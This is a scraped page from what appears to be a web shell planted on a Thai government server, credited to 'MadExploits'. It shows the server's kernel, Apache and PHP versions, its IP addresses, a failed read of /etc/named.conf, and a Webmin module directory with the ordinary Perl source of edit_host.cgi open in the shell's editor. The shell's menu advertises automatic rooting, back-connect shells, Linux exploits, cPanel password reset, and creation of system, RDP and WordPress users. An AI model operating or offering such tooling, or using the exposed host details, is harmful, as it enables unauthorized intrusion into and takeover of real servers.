Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
webmin /
cluster-useradmin /
[ HOME SHELL ]
Name
Size
Permission
Action
help
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
CHANGELOG
273
B
-rw-r--r--
add.cgi
2.09
KB
-rwxr-xr-x
cluster-useradmin-lib.pl
5.5
KB
-rwxr-xr-x
config
150
B
-rw-r--r--
config.info
558
B
-rw-r--r--
config.info.ca
644
B
-rw-r--r--
config.info.ca.UTF-8
655
B
-rw-r--r--
config.info.cz
71
B
-rw-r--r--
config.info.cz.UTF-8
79
B
-rw-r--r--
config.info.de
669
B
-rw-r--r--
config.info.de.UTF-8
669
B
-rw-r--r--
config.info.es
90
B
-rw-r--r--
config.info.es.UTF-8
90
B
-rw-r--r--
config.info.fr
75
B
-rw-r--r--
config.info.fr.UTF-8
77
B
-rw-r--r--
config.info.hr
0
B
-rw-r--r--
config.info.hu
0
B
-rw-r--r--
config.info.ms_MY
131
B
-rw-r--r--
config.info.ms_MY.UTF-8
131
B
-rw-r--r--
config.info.nl
129
B
-rw-r--r--
config.info.nl.UTF-8
129
B
-rw-r--r--
config.info.no
141
B
-rw-r--r--
config.info.no.UTF-8
141
B
-rw-r--r--
config.info.pl
118
B
-rw-r--r--
config.info.pl.UTF-8
121
B
-rw-r--r--
create_group.cgi
3.32
KB
-rwxr-xr-x
create_user.cgi
9.72
KB
-rwxr-xr-x
delete_group.cgi
3.61
KB
-rwxr-xr-x
delete_host.cgi
257
B
-rwxr-xr-x
delete_user.cgi
5.22
KB
-rwxr-xr-x
edit_group.cgi
5.4
KB
-rwxr-xr-x
edit_host.cgi
2.78
KB
-rwxr-xr-x
edit_user.cgi
17.68
KB
-rwxr-xr-x
group_form.cgi
2.24
KB
-rwxr-xr-x
index.cgi
7.28
KB
-rwxr-xr-x
log_parser.pl
542
B
-rwxr-xr-x
module.info
387
B
-rw-r--r--
module.info.ca
259
B
-rw-r--r--
module.info.ca.UTF-8
277
B
-rw-r--r--
module.info.cz
38
B
-rw-r--r--
module.info.cz.UTF-8
46
B
-rw-r--r--
module.info.de
151
B
-rw-r--r--
module.info.de.UTF-8
163
B
-rw-r--r--
module.info.es
36
B
-rw-r--r--
module.info.es.UTF-8
42
B
-rw-r--r--
module.info.fr
44
B
-rw-r--r--
module.info.fr.UTF-8
50
B
-rw-r--r--
module.info.hu
29
B
-rw-r--r--
module.info.hu.UTF-8
37
B
-rw-r--r--
module.info.ms_MY
253
B
-rw-r--r--
module.info.ms_MY.UTF-8
265
B
-rw-r--r--
module.info.nl
40
B
-rw-r--r--
module.info.nl.UTF-8
46
B
-rw-r--r--
module.info.no
36
B
-rw-r--r--
module.info.no.UTF-8
42
B
-rw-r--r--
module.info.pl
230
B
-rw-r--r--
module.info.pl.UTF-8
252
B
-rw-r--r--
refresh.cgi
2.31
KB
-rwxr-xr-x
save_group.cgi
4.65
KB
-rwxr-xr-x
save_user.cgi
12.76
KB
-rwxr-xr-x
search_group.cgi
1.69
KB
-rwxr-xr-x
search_user.cgi
1.73
KB
-rwxr-xr-x
sync.cgi
4.92
KB
-rwxr-xr-x
sync_form.cgi
2.99
KB
-rwxr-xr-x
user_form.cgi
9.08
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : edit_host.cgi
#!/usr/bin/perl # edit_host.cgi # Display users and groups on some host require './cluster-useradmin-lib.pl'; &ReadParse(); &ui_print_header(undef, $text{'host_title'}, ""); @hosts = &list_useradmin_hosts(); ($host) = grep { $_->{'id'} == $in{'id'} } @hosts; $server = &foreign_call("servers", "get_server", $in{'id'}); @packages = @{$host->{'packages'}}; # Show host details print "<table border width=100%>\n"; print "<tr $tb> <td><b>$text{'host_header'}</b></td> </tr>\n"; print "<tr $cb> <td><table width=100%>\n"; print "<tr> <td><b>$text{'host_name'}</b></td>\n"; if ($server->{'id'}) { print "<td>"; printf &ui_link("/servers/link.cgi/%s/","%s"), $server->{'id'}, $server->{'desc'} ? "$server->{'desc'} ($server->{'host'}:$server->{'port'})" : "$server->{'host'}:$server->{'port'}"; print "</td>"; } else { print "<td colspan=3><a href=/>$text{'this_server'}</a></td>\n"; } if ($server->{'id'}) { print "<td><b>$text{'host_type'}</b></td> <td>\n"; foreach $t (@servers::server_types) { print $t->[1] if ($t->[0] eq $server->{'type'}); } print "</td>\n"; } print "</tr>\n"; print "<tr> <td><b>$text{'host_users'}</b></td>\n"; printf "<td>%d</td>\n", scalar(@{$host->{'users'}}); print "<td><b>$text{'host_groups'}</b></td>\n"; printf "<td>%d</td> </tr>\n", scalar(@{$host->{'groups'}}); print "</table></td></tr></table>\n"; # Show delete and refresh buttons print "<p><table width=100%><tr>\n"; print "<td><form action=delete_host.cgi>\n"; print "<input type=hidden name=id value=$in{'id'}>\n"; print "<input type=submit value='$text{'host_delete'}'>\n"; print "</form></td>\n"; print "<td align=right><form action=refresh.cgi>\n"; print "<input type=hidden name=id value=$in{'id'}>\n"; print "<input type=submit value='$text{'host_refresh'}'>\n"; print "</form></td>\n"; print "</tr></table>\n"; # Show users and groups print &ui_hr(); print &ui_subheading($text{'host_ulist'}); print "<table width=100% border>\n"; print "<tr $tb> <td><b>$text{'index_users'}</b></td> </tr>\n"; print "<tr $cb> <td><table width=100%>\n"; foreach $u (@{$host->{'users'}}) { if ($i%4 == 0) { print "<tr>\n"; } print "<td><a href=\"edit_user.cgi?user=$u->{'user'}&", "host=$server->{'id'}\">$u->{'user'}</a></td>\n"; if ($i%4 == 3) { print "</tr>\n"; } $i++; } print "</table></td> </tr></table>\n"; print &ui_subheading($text{'host_glist'}); print "<table width=100% border>\n"; print "<tr $tb> <td><b>$text{'index_groups'}</b></td> </tr>\n"; print "<tr $cb> <td><table width=100%>\n"; foreach $g (@{$host->{'groups'}}) { if ($j%4 == 0) { print "<tr>\n"; } print "<td><a href=\"edit_group.cgi?group=$g->{'group'}&", "host=$server->{'id'}\">$g->{'group'}</a></td>\n"; if ($j%4 == 3) { print "</tr>\n"; } $j++; } print "</table></td> </tr></table>\n"; &ui_print_footer("", $text{'index_return'});
Close